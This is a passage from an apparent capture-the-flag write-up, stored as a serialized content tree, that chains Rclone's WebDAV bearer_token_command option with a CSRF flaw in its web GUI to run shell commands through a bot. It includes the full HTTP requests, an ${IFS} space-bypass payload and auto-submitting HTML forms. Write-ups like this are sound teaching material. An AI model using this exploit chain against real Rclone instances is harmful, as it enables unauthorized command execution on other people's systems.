0},[1229],{"type":32,"tag":81,"props":1230,"children":1231},{"style":94},[1232],{"type":37,"value":854},{"type":32,"tag":81,"props":1234,"children":1235},{"class":83,"line":113},[1236,1241,1245,1250,1255,1259,1264],{"type":32,"tag":81,"props":1237,"children":1238},{"style":860},[1239],{"type":37,"value":1240}," context",{"type":32,"tag":81,"props":1242,"children":1243},{"style":94},[1244],{"type":37,"value":966},{"type":32,"tag":81,"props":1246,"children":1247},{"style":503},[1248],{"type":37,"value":1249}," await",{"type":32,"tag":81,"props":1251,"children":1252},{"style":860},[1253],{"type":37,"value":1254}," browser",{"type":32,"tag":81,"props":1256,"children":1257},{"style":94},[1258],{"type":37,"value":868},{"type":32,"tag":81,"props":1260,"children":1261},{"style":871},[1262],{"type":37,"value":1263},"createBrowserContext",{"type":32,"tag":81,"props":1265,"children":1266},{"style":94},[1267],{"type":37,"value":1268},"()\n",{"type":32,"tag":81,"props":1270,"children":1271},{"class":83,"line":133},[1272],{"type":32,"tag":81,"props":1273,"children":1274},{"emptyLinePlaceholder":572},[1275],{"type":37,"value":575},{"type":32,"tag":81,"props":1277,"children":1278},{"class":83,"line":152},[1279,1284,1289,1293,1297,1302,1306,1311],{"type":32,"tag":81,"props":1280,"children":1281},{"style":901},[1282],{"type":37,"value":1283}," const",{"type":32,"tag":81,"props":1285,"children":1286},{"style":860},[1287],{"type":37,"value":1288}," page1",{"type":32,"tag":81,"props":1290,"children":1291},{"style":94},[1292],{"type":37,"value":966},{"type":32,"tag":81,"props":1294,"children":1295},{"style":503},[1296],{"type":37,"value":1249},{"type":32,"tag":81,"props":1298,"children":1299},{"style":860},[1300],{"type":37,"value":1301}," context",{"type":32,"tag":81,"props":1303,"children":1304},{"style":94},[1305],{"type":37,"value":868},{"type":32,"tag":81,"props":1307,"children":1308},{"style":871},[1309],{"type":37,"value":1310},"newPage",{"type":32,"tag":81,"props":1312,"children":1313},{"style":94},[1314],{"type":37,"value":1268},{"type":32,"tag":81,"props":1316,"children":1317},{"class":83,"line":165},[1318,1322,1326,1330,1335,1339,1344],{"type":32,"tag":81,"props":1319,"children":1320},{"style":503},[1321],{"type":37,"value":1067},{"type":32,"tag":81,"props":1323,"children":1324},{"style":860},[1325],{"type":37,"value":1288},{"type":32,"tag":81,"props":1327,"children":1328},{"style":94},[1329],{"type":37,"value":868},{"type":32,"tag":81,"props":1331,"children":1332},{"style":871},[1333],{"type":37,"value":1334},"goto",{"type":32,"tag":81,"props":1336,"children":1337},{"style":94},[1338],{"type":37,"value":879},{"type":32,"tag":81,"props":1340,"children":1341},{"style":860},[1342],{"type":37,"value":1343},"LOGIN_URL",{"type":32,"tag":81,"props":1345,"children":1346},{"style":94},[1347],{"type":37,"value":1059},{"type":32,"tag":81,"props":1349,"children":1350},{"class":83,"line":185},[1351,1355,1359,1363,1368],{"type":32,"tag":81,"props":1352,"children":1353},{"style":503},[1354],{"type":37,"value":1067},{"type":32,"tag":81,"props":1356,"children":1357},{"style":860},[1358],{"type":37,"value":1288},{"type":32,"tag":81,"props":1360,"children":1361},{"style":94},[1362],{"type":37,"value":868},{"type":32,"tag":81,"props":1364,"children":1365},{"style":871},[1366],{"type":37,"value":1367},"close",{"type":32,"tag":81,"props":1369,"children":1370},{"style":94},[1371],{"type":37,"value":1268},{"type":32,"tag":81,"props":1373,"children":1374},{"class":83,"line":198},[1375],{"type":32,"tag":81,"props":1376,"children":1377},{"emptyLinePlaceholder":572},[1378],{"type":37,"value":575},{"type":32,"tag":81,"props":1380,"children":1381},{"class":83,"line":222},[1382,1386,1391,1395,1399,1403,1407,1411],{"type":32,"tag":81,"props":1383,"children":1384},{"style":901},[1385],{"type":37,"value":1283},{"type":32,"tag":81,"props":1387,"children":1388},{"style":860},[1389],{"type":37,"value":1390}," page2",{"type":32,"tag":81,"props":1392,"children":1393},{"style":94},[1394],{"type":37,"value":966},{"type":32,"tag":81,"props":1396,"children":1397},{"style":503},[1398],{"type":37,"value":1249},{"type":32,"tag":81,"props":1400,"children":1401},{"style":860},[1402],{"type":37,"value":1301},{"type":32,"tag":81,"props":1404,"children":1405},{"style":94},[1406],{"type":37,"value":868},{"type":32,"tag":81,"props":1408,"children":1409},{"style":871},[1410],{"type":37,"value":1310},{"type":32,"tag":81,"props":1412,"children":1413},{"style":94},[1414],{"type":37,"value":1268},{"type":32,"tag":81,"props":1416,"children":1417},{"class":83,"line":235},[1418,1422,1427,1431,1436],{"type":32,"tag":81,"props":1419,"children":1420},{"style":503},[1421],{"type":37,"value":1067},{"type":32,"tag":81,"props":1423,"children":1424},{"style":88},[1425],{"type":37,"value":1426}," Promise",{"type":32,"tag":81,"props":1428,"children":1429},{"style":94},[1430],{"type":37,"value":868},{"type":32,"tag":81,"props":1432,"children":1433},{"style":871},[1434],{"type":37,"value":1435},"race",{"type":32,"tag":81,"props":1437,"children":1438},{"style":94},[1439],{"type":37,"value":1440},"([\n",{"type":32,"tag":81,"props":1442,"children":1443},{"class":83,"line":248},[1444,1449,1453,1457,1461,1465,1469],{"type":32,"tag":81,"props":1445,"children":1446},{"style":860},[1447],{"type":37,"value":1448}," page2",{"type":32,"tag":81,"props":1450,"children":1451},{"style":94},[1452],{"type":37,"value":868},{"type":32,"tag":81,"props":1454,"children":1455},{"style":871},[1456],{"type":37,"value":1334},{"type":32,"tag":81,"props":1458,"children":1459},{"style":94},[1460],{"type":37,"value":879},{"type":32,"tag":81,"props":1462,"children":1463},{"style":860},[1464],{"type":37,"value":1040},{"type":32,"tag":81,"props":1466,"children":1467},{"style":94},[1468],{"type":37,"value":898},{"type":32,"tag":81,"props":1470,"children":1471},{"style":94},[1472],{"type":37,"value":938},{"type":32,"tag":81,"props":1474,"children":1475},{"class":83,"line":261},[1476,1481,1485,1490,1495],{"type":32,"tag":81,"props":1477,"children":1478},{"style":88},[1479],{"type":37,"value":1480}," waitUntil",{"type":32,"tag":81,"props":1482,"children":1483},{"style":94},[1484],{"type":37,"value":124},{"type":32,"tag":81,"props":1486,"children":1487},{"style":206},[1488],{"type":37,"value":1489}," '",{"type":32,"tag":81,"props":1491,"children":1492},{"style":127},[1493],{"type":37,"value":1494},"networkidle0",{"type":32,"tag":81,"props":1496,"children":1497},{"style":206},[1498],{"type":37,"value":1499},"'\n",{"type":32,"tag":81,"props":1501,"children":1502},{"class":83,"line":278},[1503],{"type":32,"tag":81,"props":1504,"children":1505},{"style":94},[1506],{"type":37,"value":1507}," }),\n",{"type":32,"tag":81,"props":1509,"children":1510},{"class":83,"line":295},[1511,1516,1520,1525],{"type":32,"tag":81,"props":1512,"children":1513},{"style":871},[1514],{"type":37,"value":1515}," sleep",{"type":32,"tag":81,"props":1517,"children":1518},{"style":94},[1519],{"type":37,"value":879},{"type":32,"tag":81,"props":1521,"children":1522},{"style":146},[1523],{"type":37,"value":1524},"5000",{"type":32,"tag":81,"props":1526,"children":1527},{"style":94},[1528],{"type":37,"value":1059},{"type":32,"tag":81,"props":1530,"children":1531},{"class":83,"line":307},[1532],{"type":32,"tag":81,"props":1533,"children":1534},{"style":94},[1535],{"type":37,"value":1536}," ])\n",{"type":32,"tag":81,"props":1538,"children":1539},{"class":83,"line":320},[1540],{"type":32,"tag":81,"props":1541,"children":1542},{"style":94},[1543],{"type":37,"value":854},{"type":32,"tag":81,"props":1545,"children":1546},{"class":83,"line":333},[1547],{"type":32,"tag":81,"props":1548,"children":1549},{"style":94},[1550],{"type":37,"value":1551},"}\n",{"type":32,"tag":46,"props":1553,"children":1554},{},[1555],{"type":37,"value":1556},"Note that the submitted URL to the bot must just comply with the HTTP standards, namely http or https + :// + domain",{"type":32,"tag":46,"props":1558,"children":1559},{},[1560],{"type":37,"value":1561},"So in one thing, our only entry point is the bot, and given the name of the challenge which suggests RCE, we potentially need to RCE on the Rclone service.",{"type":32,"tag":39,"props":1563,"children":1565},{"id":1564},"rce",[1566],{"type":37,"value":1567},"RCE ?",{"type":32,"tag":46,"props":1569,"children":1570},{},[1571,1573,1580],{"type":37,"value":1572},"To begin, we will explore the ",{"type":32,"tag":528,"props":1574,"children":1577},{"href":1575,"rel":1576},"https://github.com/rclone/rclone",[532],[1578],{"type":37,"value":1579},"source code of Rclone",{"type":37,"value":1581},", with the aim of looking for places that might allow RCE.",{"type":32,"tag":46,"props":1583,"children":1584},{},[1585],{"type":37,"value":1586},"Quickly, we come across the WebDav service which has an option that allows commands to be executed.",{"type":32,"tag":56,"props":1588,"children":1590},{"imgSrc":1589},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721244501/writeups/rclone/webdav_exec_command.webp",[],{"type":32,"tag":46,"props":1592,"children":1593},{},[1594,1596,1602],{"type":37,"value":1595},"However, note the use of the split function which will split our option at each space present in the command. An effective method to avoid breaking the command is to use the ",{"type":32,"tag":77,"props":1597,"children":1599},{"className":1598},[],[1600],{"type":37,"value":1601},"IFS",{"type":37,"value":1603}," bash variable which will be interpreted as a space in bash but will not be split by the go function.",{"type":32,"tag":46,"props":1605,"children":1606},{},[1607],{"type":37,"value":1608},"We can quickly test these options to see if we can execute commands on the Rclone service with a basic payload.",{"type":32,"tag":66,"props":1610,"children":1612},{"lang":1611},"bash",[1613],{"type":32,"tag":71,"props":1614,"children":1617},{"code":1615,"language":1611,"meta":7,"className":1616,"style":7},"bash -c touch${IFS}/tmp/lolipop\n","language-bash shiki shiki-themes vitesse-dark",[1618],{"type":32,"tag":77,"props":1619,"children":1620},{"__ignoreMap":7},[1621],{"type":32,"tag":81,"props":1622,"children":1623},{"class":83,"line":84},[1624,1628,1634,1639,1643,1647,1651],{"type":32,"tag":81,"props":1625,"children":1626},{"style":871},[1627],{"type":37,"value":1611},{"type":32,"tag":81,"props":1629,"children":1631},{"style":1630},"--shiki-default:#C99076",[1632],{"type":37,"value":1633}," -c",{"type":32,"tag":81,"props":1635,"children":1636},{"style":127},[1637],{"type":37,"value":1638}," touch",{"type":32,"tag":81,"props":1640,"children":1641},{"style":94},[1642],{"type":37,"value":1035},{"type":32,"tag":81,"props":1644,"children":1645},{"style":860},[1646],{"type":37,"value":1601},{"type":32,"tag":81,"props":1648,"children":1649},{"style":94},[1650],{"type":37,"value":1045},{"type":32,"tag":81,"props":1652,"children":1653},{"style":127},[1654],{"type":37,"value":1655},"/tmp/lolipop\n",{"type":32,"tag":46,"props":1657,"children":1658},{},[1659],{"type":37,"value":1660},"Our HTTP request to create the remote will look like this:",{"type":32,"tag":56,"props":1662,"children":1664},{"imgSrc":1663},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721245298/writeups/rclone/rclone_create_webdav_command.webp",[],{"type":32,"tag":46,"props":1666,"children":1667},{},[1668],{"type":37,"value":1669},"Here is the HTTP request.\nWe can see that we have several parameters in the body of the request:",{"type":32,"tag":1671,"props":1672,"children":1673},"ul",{},[1674,1693,1698],{"type":32,"tag":1675,"props":1676,"children":1677},"li",{},[1678,1680],{"type":37,"value":1679},"Parameters:\n",{"type":32,"tag":1671,"props":1681,"children":1682},{},[1683,1688],{"type":32,"tag":1675,"props":1684,"children":1685},{},[1686],{"type":37,"value":1687},"Url: defines the url of the webdav (in our case it doesn't matter if this url doesn't work)",{"type":32,"tag":1675,"props":1689,"children":1690},{},[1691],{"type":37,"value":1692},"bearer_token_command: which will contain our bash payload that will be executed by the rclone service",{"type":32,"tag":1675,"props":1694,"children":1695},{},[1696],{"type":37,"value":1697},"Name: which will correspond to the name of the remote",{"type":32,"tag":1675,"props":1699,"children":1700},{},[1701],{"type":37,"value":1702},"Type: the type of remote we are using here is Webdav",{"type":32,"tag":71,"props":1704,"children":1706},{"code":1705},"POST /config/create HTTP/1.1\nHost: localhost:5572\nContent-Type: application/json\nAuthorization: Basic c2VjcmV0OnNlY3JldA==\nContent-Length: 167\n\n{\n \"parameters\": {\n \"url\": \"http://not_exist.localhost:9999\",\n \"bearer_token_command\":\"bash -c touch${IFS}/tmp/lolipop\"\n },\n \"name\":\"test_webdav\",\n \"type\":\"webdav\"\n}\n",[1707],{"type":32,"tag":77,"props":1708,"children":1709},{"__ignoreMap":7},[1710],{"type":37,"value":1705},{"type":32,"tag":46,"props":1712,"children":1713},{},[1714],{"type":37,"value":1715},"In order to execute our payload, it is necessary to open the config recently created and list the files present in the remote.",{"type":32,"tag":46,"props":1717,"children":1718},{},[1719],{"type":37,"value":1720},"For that we use the following request:",{"type":32,"tag":71,"props":1722,"children":1724},{"code":1723},"POST /operations/list HTTP/1.1\nHost: localhost:5572\nContent-Type: application/json\nAuthorization: Basic c2VjcmV0OnNlY3JldA==\nContent-Length: 33\n\n{\n \"fs\":\"test_webdav:\",\n \"remote\":\"\"\n}\n",[1725],{"type":32,"tag":77,"props":1726,"children":1727},{"__ignoreMap":7},[1728],{"type":37,"value":1723},{"type":32,"tag":56,"props":1730,"children":1732},{"imgSrc":1731},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721245298/writeups/rclone/rclone_explorer.webp",[],{"type":32,"tag":46,"props":1734,"children":1735},{},[1736],{"type":37,"value":1737},"We can see that our file has been successfully created.",{"type":32,"tag":56,"props":1739,"children":1741},{"imgSrc":1740},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721245280/writeups/rclone/ls_tmp.webp",[],{"type":32,"tag":46,"props":1743,"children":1744},{},[1745],{"type":37,"value":1746},"So we have a race on the rclone service, however for flag it is necessary to go through the bot.",{"type":32,"tag":46,"props":1748,"children":1749},{},[1750],{"type":37,"value":1751},"However, it is not possible for us to execute post requests with javascript as with the fetch command from a different domain, the credentials will not be used during the request and a prompt asking to authenticate will be displayed. We need to find a way to bypass this problem, such as with a CSRF, which is what we will look at in the next section.",{"type":32,"tag":39,"props":1753,"children":1755},{"id":1754},"gui-is-experimental",[1756],{"type":37,"value":1757},"GUI is experimental",{"type":32,"tag":46,"props":1759,"children":1760},{},[1761,1763,1770],{"type":37,"value":1762},"When we go to the ",{"type":32,"tag":528,"props":1764,"children":1767},{"href":1765,"rel":1766},"https://rclone.org/gui/",[532],[1768],{"type":37,"value":1769},"Rclone documentation",{"type":37,"value":1771},", we realize that the Gui option is marked as experimental.",{"type":32,"tag":56,"props":1773,"children":1775},{"imgSrc":1774},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721245952/writeups/rclone/gui_experimental.webp",[],{"type":32,"tag":46,"props":1777,"children":1778},{},[1779,1781],{"type":37,"value":1780},"The documentation also gives us access to the front-end GitHub. ",{"type":32,"tag":528,"props":1782,"children":1785},{"href":1783,"rel":1784},"https://github.com/rclone/rclone-webui-react",[532],[1786],{"type":37,"value":1787},"rclone-webui-react",{"type":32,"tag":46,"props":1789,"children":1790},{},[1791,1793,1800],{"type":37,"value":1792},"In the GitHub, we can see ",{"type":32,"tag":528,"props":1794,"children":1797},{"href":1795,"rel":1796},"https://github.com/rclone/rclone-webui-react/issues/128",[532],[1798],{"type":37,"value":1799},"an open issue",{"type":37,"value":1801}," indicating that Rclone-webui is potentially vulnerable to CSRF attacks.",{"type":32,"tag":56,"props":1803,"children":1805},{"imgSrc":1804},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721245965/writeups/rclone/issue_csrf.webp",[],{"type":32,"tag":46,"props":1807,"children":1808},{},[1809],{"type":37,"value":1810},"A proof of concept is also provided, allowing us to understand that the parameters sent in the API's POST requests can also be sent in the query parameters.",{"type":32,"tag":46,"props":1812,"children":1813},{},[1814],{"type":37,"value":1815},"We therefore have the possibility from the bot to trigger a CSRF with our RCE payload that was created in the previous section. We can now test it with the bot in order to PoC the RCE via the bot.",{"type":32,"tag":46,"props":1817,"children":1818},{},[1819],{"type":37,"value":1820},"For this, we will create three files: two HTML files for CSRF and one index.html file that will allow us to open the two CSRF files, one to create the remote and one to trigger the RCE.",{"type":32,"tag":46,"props":1822,"children":1823},{},[1824],{"type":37,"value":1825},"We will use the same bash payload as before, but this time we will encode it in base64 to pass it as a query parameter.",{"type":32,"tag":66,"props":1827,"children":1828},{"lang":1611},[1829],{"type":32,"tag":71,"props":1830,"children":1832},{"code":1831,"language":1611,"meta":7,"className":1616,"style":7},"bash -c touch${IFS}/tmp/lolipop_from_bot\n",[1833],{"type":32,"tag":77,"props":1834,"children":1835},{"__ignoreMap":7},[1836],{"type":32,"tag":81,"props":1837,"children":1838},{"class":83,"line":84},[1839,1843,1847,1851,1855,1859,1863],{"type":32,"tag":81,"props":1840,"children":1841},{"style":871},[1842],{"type":37,"value":1611},{"type":32,"tag":81,"props":1844,"children":1845},{"style":1630},[1846],{"type":37,"value":1633},{"type":32,"tag":81,"props":1848,"children":1849},{"style":127},[1850],{"type":37,"value":1638},{"type":32,"tag":81,"props":1852,"children":1853},{"style":94},[1854],{"type":37,"value":1035},{"type":32,"tag":81,"props":1856,"children":1857},{"style":860},[1858],{"type":37,"value":1601},{"type":32,"tag":81,"props":1860,"children":1861},{"style":94},[1862],{"type":37,"value":1045},{"type":32,"tag":81,"props":1864,"children":1865},{"style":127},[1866],{"type":37,"value":1867},"/tmp/lolipop_from_bot\n",{"type":32,"tag":46,"props":1869,"children":1870},{},[1871],{"type":37,"value":1872},"Below, find the three files that allow us to execute the command:",{"type":32,"tag":46,"props":1874,"children":1875},{},[1876],{"type":37,"value":1877},"Our index.html file which will contain the redirection to our two csrf:",{"type":32,"tag":66,"props":1879,"children":1881},{"lang":1880},"html",[1882],{"type":32,"tag":71,"props":1883,"children":1886},{"code":1884,"language":1880,"meta":7,"className":1885,"style":7},"\u003C!-- index.html -->\n\u003Cscript>\n window.open(\"/1.html\", \"_blank\");\n setTimeout(() => {\n window.open(\"/2.html\", \"_blank\");\n }, 300);\n\u003C/script>\n","language-html shiki shiki-themes vitesse-dark",[1887],{"type":32,"tag":77,"props":1888,"children":1889},{"__ignoreMap":7},[1890,1898,1916,1972,1993,2046,2063],{"type":32,"tag":81,"props":1891,"children":1892},{"class":83,"line":84},[1893],{"type":32,"tag":81,"props":1894,"children":1895},{"style":179},[1896],{"type":37,"value":1897},"\u003C!-- index.html -->\n",{"type":32,"tag":81,"props":1899,"children":1900},{"class":83,"line":100},[1901,1906,1911],{"type":32,"tag":81,"props":1902,"children":1903},{"style":94},[1904],{"type":37,"value":1905},"\u003C",{"type":32,"tag":81,"props":1907,"children":1908},{"style":503},[1909],{"type":37,"value":1910},"script",{"type":32,"tag":81,"props":1912,"children":1913},{"style":94},[1914],{"type":37,"value":1915},">\n",{"type":32,"tag":81,"props":1917,"children":1918},{"class":83,"line":113},[1919,1924,1928,1933,1937,1942,1947,1951,1955,1959,1963,1967],{"type":32,"tag":81,"props":1920,"children":1921},{"style":860},[1922],{"type":37,"value":1923}," window",{"type":32,"tag":81,"props":1925,"children":1926},{"style":94},[1927],{"type":37,"value":868},{"type":32,"tag":81,"props":1929,"children":1930},{"style":871},[1931],{"type":37,"value":1932},"open",{"type":32,"tag":81,"props":1934,"children":1935},{"style":94},[1936],{"type":37,"value":879},{"type":32,"tag":81,"props":1938,"children":1939},{"style":206},[1940],{"type":37,"value":1941},"\"",{"type":32,"tag":81,"props":1943,"children":1944},{"style":127},[1945],{"type":37,"value":1946},"/1.html",{"type":32,"tag":81,"props":1948,"children":1949},{"style":206},[1950],{"type":37,"value":1941},{"type":32,"tag":81,"props":1952,"children":1953},{"style":94},[1954],{"type":37,"value":898},{"type":32,"tag":81,"props":1956,"children":1957},{"style":206},[1958],{"type":37,"value":209},{"type":32,"tag":81,"props":1960,"children":1961},{"style":127},[1962],{"type":37,"value":533},{"type":32,"tag":81,"props":1964,"children":1965},{"style":206},[1966],{"type":37,"value":1941},{"type":32,"tag":81,"props":1968,"children":1969},{"style":94},[1970],{"type":37,"value":1971},");\n",{"type":32,"tag":81,"props":1973,"children":1974},{"class":83,"line":133},[1975,1980,1985,1989],{"type":32,"tag":81,"props":1976,"children":1977},{"style":871},[1978],{"type":37,"value":1979}," setTimeout",{"type":32,"tag":81,"props":1981,"children":1982},{"style":94},[1983],{"type":37,"value":1984},"(()",{"type":32,"tag":81,"props":1986,"children":1987},{"style":94},[1988],{"type":37,"value":933},{"type":32,"tag":81,"props":1990,"children":1991},{"style":94},[1992],{"type":37,"value":938},{"type":32,"tag":81,"props":1994,"children":1995},{"class":83,"line":152},[1996,2001,2005,2009,2013,2017,2022,2026,2030,2034,2038,2042],{"type":32,"tag":81,"props":1997,"children":1998},{"style":860},[1999],{"type":37,"value":2000}," window",{"type":32,"tag":81,"props":2002,"children":2003},{"style":94},[2004],{"type":37,"value":868},{"type":32,"tag":81,"props":2006,"children":2007},{"style":871},[2008],{"type":37,"value":1932},{"type":32,"tag":81,"props":2010,"children":2011},{"style":94},[2012],{"type":37,"value":879},{"type":32,"tag":81,"props":2014,"children":2015},{"style":206},[2016],{"type":37,"value":1941},{"type":32,"tag":81,"props":2018,"children":2019},{"style":127},[2020],{"type":37,"value":2021},"/2.html",{"type":32,"tag":81,"props":2023,"children":2024},{"style":206},[2025],{"type":37,"value":1941},{"type":32,"tag":81,"props":2027,"children":2028},{"style":94},[2029],{"type":37,"value":898},{"type":32,"tag":81,"props":2031,"children":2032},{"style":206},[2033],{"type":37,"value":209},{"type":32,"tag":81,"props":2035,"children":2036},{"style":127},[2037],{"type":37,"value":533},{"type":32,"tag":81,"props":2039,"children":2040},{"style":206},[2041],{"type":37,"value":1941},{"type":32,"tag":81,"props":2043,"children":2044},{"style":94},[2045],{"type":37,"value":1971},{"type":32,"tag":81,"props":2047,"children":2048},{"class":83,"line":165},[2049,2054,2059],{"type":32,"tag":81,"props":2050,"children":2051},{"style":94},[2052],{"type":37,"value":2053}," },",{"type":32,"tag":81,"props":2055,"children":2056},{"style":146},[2057],{"type":37,"value":2058}," 300",{"type":32,"tag":81,"props":2060,"children":2061},{"style":94},[2062],{"type":37,"value":1971},{"type":32,"tag":81,"props":2064,"children":2065},{"class":83,"line":185},[2066,2071,2075],{"type":32,"tag":81,"props":2067,"children":2068},{"style":94},[2069],{"type":37,"value":2070},"\u003C/",{"type":32,"tag":81,"props":2072,"children":2073},{"style":503},[2074],{"type":37,"value":1910},{"type":32,"tag":81,"props":2076,"children":2077},{"style":94},[2078],{"type":37,"value":1915},{"type":32,"tag":46,"props":2080,"children":2081},{},[2082],{"type":37,"value":2083},"First CSRF allowing us to create our \"remote\" of type webdav. We will find the parameters we described earlier in the body in this case we need to encode it and pass it as a query parameter.",{"type":32,"tag":66,"props":2085,"children":2086},{"lang":1880},[2087],{"type":32,"tag":71,"props":2088,"children":2090},{"code":2089,"language":1880,"meta":7,"className":1885,"style":7},"\u003C!-- 1.html -->\n \u003Cform method=\"POST\" action='http://rclone:5572/config/create?parameters={\"url\"%3a\"http%3a//not_exist.localhost:9999\",\"bearer_token_command\"%3a\"bash+-c+touch${IFS}/tmp/lolipop_from_bot\"}&name=test_csrf&type=webdav'>\n \u003Cinput type=\"submit\" value=\"CSRF\" />\n \u003Cscript>\n document.forms[0].submit();\n \u003C/script>\n\u003C/form>\n",[2091],{"type":32,"tag":77,"props":2092,"children":2093},{"__ignoreMap":7},[2094,2102,2164,2226,2241,2282,2298],{"type":32,"tag":81,"props":2095,"children":2096},{"class":83,"line":84},[2097],{"type":32,"tag":81,"props":2098,"children":2099},{"style":179},[2100],{"type":37,"value":2101},"\u003C!-- 1.html -->\n",{"type":32,"tag":81,"props":2103,"children":2104},{"class":83,"line":100},[2105,2110,2115,2120,2125,2129,2134,2138,2143,2147,2151,2156,2160],{"type":32,"tag":81,"props":2106,"children":2107},{"style":94},[2108],{"type":37,"value":2109}," \u003C",{"type":32,"tag":81,"props":2111,"children":2112},{"style":503},[2113],{"type":37,"value":2114},"form",{"type":32,"tag":81,"props":2116,"children":2117},{"style":860},[2118],{"type":37,"value":2119}," method",{"type":32,"tag":81,"props":2121,"children":2122},{"style":94},[2123],{"type":37,"value":2124},"=",{"type":32,"tag":81,"props":2126,"children":2127},{"style":206},[2128],{"type":37,"value":1941},{"type":32,"tag":81,"props":2130,"children":2131},{"style":127},[2132],{"type":37,"value":2133},"POST",{"type":32,"tag":81,"props":2135,"children":2136},{"style":206},[2137],{"type":37,"value":1941},{"type":32,"tag":81,"props":2139,"children":2140},{"style":860},[2141],{"type":37,"value":2142}," action",{"type":32,"tag":81,"props":2144,"children":2145},{"style":94},[2146],{"type":37,"value":2124},{"type":32,"tag":81,"props":2148,"children":2149},{"style":206},[2150],{"type":37,"value":884},{"type":32,"tag":81,"props":2152,"children":2153},{"style":127},[2154],{"type":37,"value":2155},"http://rclone:5572/config/create?parameters={\"url\"%3a\"http%3a//not_exist.localhost:9999\",\"bearer_token_command\"%3a\"bash+-c+touch${IFS}/tmp/lolipop_from_bot\"}&name=test_csrf&type=webdav",{"type":32,"tag":81,"props":2157,"children":2158},{"style":206},[2159],{"type":37,"value":884},{"type":32,"tag":81,"props":2161,"children":2162},{"style":94},[2163],{"type":37,"value":1915},{"type":32,"tag":81,"props":2165,"children":2166},{"class":83,"line":113},[2167,2172,2177,2182,2186,2190,2195,2199,2204,2208,2212,2217,2221],{"type":32,"tag":81,"props":2168,"children":2169},{"style":94},[2170],{"type":37,"value":2171}," \u003C",{"type":32,"tag":81,"props":2173,"children":2174},{"style":503},[2175],{"type":37,"value":2176},"input",{"type":32,"tag":81,"props":2178,"children":2179},{"style":860},[2180],{"type":37,"value":2181}," type",{"type":32,"tag":81,"props":2183,"children":2184},{"style":94},[2185],{"type":37,"value":2124},{"type":32,"tag":81,"props":2187,"children":2188},{"style":206},[2189],{"type":37,"value":1941},{"type":32,"tag":81,"props":2191,"children":2192},{"style":127},[2193],{"type":37,"value":2194},"submit",{"type":32,"tag":81,"props":2196,"children":2197},{"style":206},[2198],{"type":37,"value":1941},{"type":32,"tag":81,"props":2200,"children":2201},{"style":860},[2202],{"type":37,"value":2203}," value",{"type":32,"tag":81,"props":2205,"children":2206},{"style":94},[2207],{"type":37,"value":2124},{"type":32,"tag":81,"props":2209,"children":2210},{"style":206},[2211],{"type":37,"value":1941},{"type":32,"tag":81,"props":2213,"children":2214},{"style":127},[2215],{"type":37,"value":2216},"CSRF",{"type":32,"tag":81,"props":2218,"children":2219},{"style":206},[2220],{"type":37,"value":1941},{"type":32,"tag":81,"props":2222,"children":2223},{"style":94},[2224],{"type":37,"value":2225}," />\n",{"type":32,"tag":81,"props":2227,"children":2228},{"class":83,"line":133},[2229,2233,2237],{"type":32,"tag":81,"props":2230,"children":2231},{"style":94},[2232],{"type":37,"value":2171},{"type":32,"tag":81,"props":2234,"children":2235},{"style":503},[2236],{"type":37,"value":1910},{"type":32,"tag":81,"props":2238,"children":2239},{"style":94},[2240],{"type":37,"value":1915},{"type":32,"tag":81,"props":2242,"children":2243},{"class":83,"line":152},[2244,2249,2253,2258,2263,2268,2273,2277],{"type":32,"tag":81,"props":2245,"children":2246},{"style":860},[2247],{"type":37,"value":2248}," document",{"type":32,"tag":81,"props":2250,"children":2251},{"style":94},[2252],{"type":37,"value":868},{"type":32,"tag":81,"props":2254,"children":2255},{"style":860},[2256],{"type":37,"value":2257},"forms",{"type":32,"tag":81,"props":2259,"children":2260},{"style":94},[2261],{"type":37,"value":2262},"[",{"type":32,"tag":81,"props":2264,"children":2265},{"style":146},[2266],{"type":37,"value":2267},"0",{"type":32,"tag":81,"props":2269,"children":2270},{"style":94},[2271],{"type":37,"value":2272},"].",{"type":32,"tag":81,"props":2274,"children":2275},{"style":871},[2276],{"type":37,"value":2194},{"type":32,"tag":81,"props":2278,"children":2279},{"style":94},[2280],{"type":37,"value":2281},"();\n",{"type":32,"tag":81,"props":2283,"children":2284},{"class":83,"line":165},[2285,2290,2294],{"type":32,"tag":81,"props":2286,"children":2287},{"style":94},[2288],{"type":37,"value":2289}," \u003C/",{"type":32,"tag":81,"props":2291,"children":2292},{"style":503},[2293],{"type":37,"value":1910},{"type":32,"tag":81,"props":2295,"children":2296},{"style":94},[2297],{"type":37,"value":1915},{"type":32,"tag":81,"props":2299,"children":2300},{"class":83,"line":185},[2301,2305,2309],{"type":32,"tag":81,"props":2302,"children":2303},{"style":94},[2304],{"type":37,"value":2070},{"type":32,"tag":81,"props":2306,"children":2307},{"style":503},[2308],{"type":37,"value":2114},{"type":32,"tag":81,"props":2310,"children":2311},{"style":94},[2312],{"type":37,"value":1915},{"type":32,"tag":46,"props":2314,"children":2315},{},[2316,2318,2324],{"type":37,"value":2317},"The second CSRF allows listing the files present in ",{"type":32,"tag":77,"props":2319,"children":2321},{"className":2320},[],[2322],{"type":37,"value":2323},"remote",{"type":37,"value":2325},", this action will then trigger our command passed as a parameter in the previous CSRF",{"type":32,"tag":66,"props":2327,"children":2328},{"lang":1880},[2329],{"type":32,"tag":71,"props":2330,"children":2332},{"code":2331,"language":1880,"meta":7,"className":1885,"style":7},"\u003C!-- 2.html -->\n\u003Cform method=\"POST\" action='http://rclone:5572/operations/list?fs=test_csrf:&remote='>\n \u003Cinput type=\"submit\" value=\"CSRF\" />\n \u003Cscript>\n document.forms[0].submit();\n \u003C/script>\n\u003C/form>\n",[2333],{"type":32,"tag":77,"props":2334,"children":2335},{"__ignoreMap":7},[2336,2344,2400,2455,2470,2505,2520],{"type":32,"tag":81,"props":2337,"children":2338},{"class":83,"line":84},[2339],{"type":32,"tag":81,"props":2340,"children":2341},{"style":179},[2342],{"type":37,"value":2343},"\u003C!-- 2.html 